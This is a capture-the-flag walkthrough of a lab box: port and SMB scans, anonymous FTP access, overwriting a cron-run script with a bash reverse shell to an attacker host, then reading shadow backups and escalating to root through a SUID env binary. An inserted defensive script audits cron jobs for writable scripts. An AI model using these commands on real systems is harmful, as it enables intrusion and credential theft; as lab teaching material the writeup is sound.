[Enumeration]
1. Port scan
nmap -Pn <ip>
There are 4 open ports: 21, 22, 139, and 445.
2. OS and service scan
nmap -A -p 21,22,139,445 <ip>
There’s anonymous login on FTP.
3. Vuln scan
nmap --script vuln -p 21,22,139,445 <ip>
Nothing
4. Samba scan
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>
There's anonymous access to the /pics share.
[Exploitation]
1. Connect to FTP
ftp <ip>
ls
There's a /scripts directory.
cd scripts
Download all files
get clean.sh
get removed_files.log
get to_do.txt
2. Read each file
cat clean.sh
This may be a cron job.
cat removed_files.log
cat to_do.txt
3. Get reverse shell
Prepare a reverse shell script and save it as "clean.sh"
#!/bin/bash
/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1'
Connect to FTP and replace clean.sh
ftp <ip>
cd scripts
put clean.sh clean.sh
Start a listener and wait about a minute for the cron job to run the script.
nc -lvp <attacker port>
ls -la
cat user.txt
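The misconfiguration abused above, a scheduled job running a script that sits in a writable anonymous share, is easy to audit from the defender's side. The following check script is added here and is not part of the original writeup; it assumes a system-crontab layout ("min hour dom mon dow user command") and builds a constructed demo tree instead of touching the real /etc/crontab.

```shell
#!/bin/sh
# Added audit helper, not from the original writeup: reports cron-run scripts
# that a low-privileged user could replace, which is the weakness this box
# exposes (clean.sh lives in an anonymously writable FTP directory and is run
# by a scheduled job). Assumption: system-crontab format with a user field.

# writable_by_others PATH -> true if group or other has the write bit on PATH
writable_by_others() {
    mode=$(ls -ld "$1" | cut -c1-10)
    case "$mode" in
        ?????w*|????????w?) return 0 ;;   # char 6 = group write, char 9 = other write
    esac
    return 1
}

# audit_cron CRONTAB -> prints "user:script:reason" per risky entry; exit 1 if any
audit_cron() {
    found=0
    while read -r min hour dom mon dow user cmd _; do
        case "$min" in ''|'#'*|*=*) continue ;; esac   # blank, comment, VAR=value
        [ -f "$cmd" ] || continue                      # only existing absolute paths
        if writable_by_others "$cmd"; then
            printf '%s:%s:file-writable\n' "$user" "$cmd"; found=1
        elif writable_by_others "$(dirname "$cmd")"; then
            printf '%s:%s:dir-writable\n' "$user" "$cmd"; found=1
        fi
    done < "$1"
    return $found
}

# Constructed demo tree mirroring the box: one job runs a script under a
# world-writable share, another runs a properly protected script. Prints the dir.
setup_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/ftp/scripts"
    printf '#!/bin/bash\necho cleaning\n' > "$d/ftp/scripts/clean.sh"
    chmod 777 "$d/ftp/scripts" "$d/ftp/scripts/clean.sh"
    printf '#!/bin/bash\necho ok\n' > "$d/safe.sh"; chmod 755 "$d/safe.sh"
    cat > "$d/crontab" <<EOF
# constructed sample system crontab
SHELL=/bin/sh
* * * * * root $d/ftp/scripts/clean.sh
*/5 * * * * root $d/safe.sh
EOF
    echo "$d"
}

if [ "${1:-}" = "--demo" ]; then
    d=$(setup_demo); audit_cron "$d/crontab"; rm -rf "$d"
fi
```

Run it with --demo to see the single flagged entry; point audit_cron at /etc/crontab or a file under /etc/cron.d to check a real host.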
[Privilege escalation]
1. Search for SSH keys
find / -name authorized_keys 2> /dev/null
Nothing
find / -name id_rsa 2> /dev/null
Nothing
2. Search for password
Search for shadow files.
find / 2>/dev/null | grep "shadow"
Read shadow.bak
cat /var/backups/shadow.bak
Search for pass files.
find / 2>/dev/null | grep -i "pass"
Read passwd.bak
cat /var/backups/pass.bak
3. Verify permissions of passwd and shadow
Verify permissions of /etc/passwd
ls -la /etc/passwd
I cannot edit it.
cat /etc/passwd
There are 2 users: root and namelessone.
Verify permissions of /etc/shadow
ls -la /etc/shadow
I cannot read it.
4. Verify history
history
Nothing much of use.
5. Verify sudo
sudo -l
No TTY shell, so sudo cannot prompt.
Spawn a TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
sudo -l
It asks for a password, which I don't have.
6. Verify SUID and SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
env has the SUID bit set.
Follow GTFOBins
env /bin/sh -p
whoami
cd /root
ls
cat root.txt